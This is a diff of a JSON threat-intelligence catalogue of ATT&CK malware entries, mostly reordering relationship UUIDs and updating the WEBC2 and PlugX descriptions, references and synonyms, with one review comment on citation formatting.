@@ -2636,41 +3647,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -2678,13 +3654,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -2706,20 +3675,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ 
@@ -2728,14 +3683,7 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2749,7 +3697,49 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2763,7 +3753,28 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2851,13 +3862,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -2866,7 +3870,14 @@ "type": "uses" }, { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2879,13 +3890,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ 
@@ -2894,7 +3898,14 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2930,13 +3941,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -2944,41 +3948,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ @@ -2987,7 +3956,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3000,6 +3969,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ @@ -3007,6 +3983,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -3015,7 +3998,21 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3028,12 +4025,26 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", 
@@ -3081,14 +4092,21 @@ "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3108,20 +4126,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -3129,13 +4133,6 @@ ], "type": "uses" }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -3143,12 +4140,26 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", 
@@ -3193,14 +4204,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3282,7 +4293,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3296,7 +4307,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3309,13 +4320,6 @@ ], "type": "uses" }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ 
@@ -3323,26 +4327,33 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6b616fc1-1505-48e3-8b2c-0d19337bff38", @@ -3390,7 +4401,7 @@ "value": "Taidoor - S0011" }, { - "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)", + "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", "meta": { "external_id": "S0109", "mitre_platforms": [ 
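Review bot: The new WEBC2 description ends with `(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)`, two citation markers with no separator, while the PlugX description in this same patch separates its markers with a space; pick one form and apply it consistently so downstream renderers and citation-to-ref mapping behave the same across entries, e.g. `(Citation: Mandiant APT1 Appendix) (Citation: Mandiant APT1)`. The ref that backs the new marker is added in the next hunk, so the pairing itself is complete.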
@@ -3398,7 +4409,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0109", - "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" ], "synonyms": [ "WEBC2" @@ -3418,6 +4430,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "1d808f62-cf63-4063-9727-ff6132514c22", @@ -3466,7 +4492,35 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3493,20 +4547,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ @@ -3515,21 +4555,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3543,7 +4569,21 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3556,20 +4596,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ 
@@ -3585,7 +4611,7 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3626,7 +4652,42 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3639,6 +4700,20 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ 
@@ -3654,21 +4729,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3682,21 +4743,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3709,40 +4756,19 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", @@ -3805,21 +4831,21 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3833,7 +4859,7 @@ "type": "uses" }, { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3847,7 +4873,7 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3867,13 +4893,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ @@ -3882,7 +4901,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3896,7 +4915,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3930,6 +4956,13 @@ ], "type": "uses" }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -3943,13 +4976,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", 
@@ -3987,7 +5013,14 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4008,7 +5041,14 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4035,6 +5075,13 @@ ], "type": "uses" }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -4043,14 +5090,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4062,20 +5102,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "fb261c56-b80e-43a9-8351-c84081e7213d", 
@@ -4116,7 +5142,7 @@
 "value": "Dendroid - S0301"
 },
 { 
- "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. (Citation: Lastline PlugX Analysis) It has been used by multiple threat groups. (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)", 
+ "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)",
 "meta": {
 "external_id": "S0013",
 "mitre_platforms": [ 
@@ -4124,13 +5150,15 @@
 ],
 "refs": [
 "https://attack.mitre.org/software/S0013", 
+ "http://labs.lastline.com/an-analysis-of-plugx",
 "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
 "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
 "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", 
- "http://labs.lastline.com/an-analysis-of-plugx" 
+ "http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf"
 ],
 "synonyms": [
 "PlugX", 
+ "DestroyRAT",
 "Sogu",
 "Kaba",
 "Korplug" 
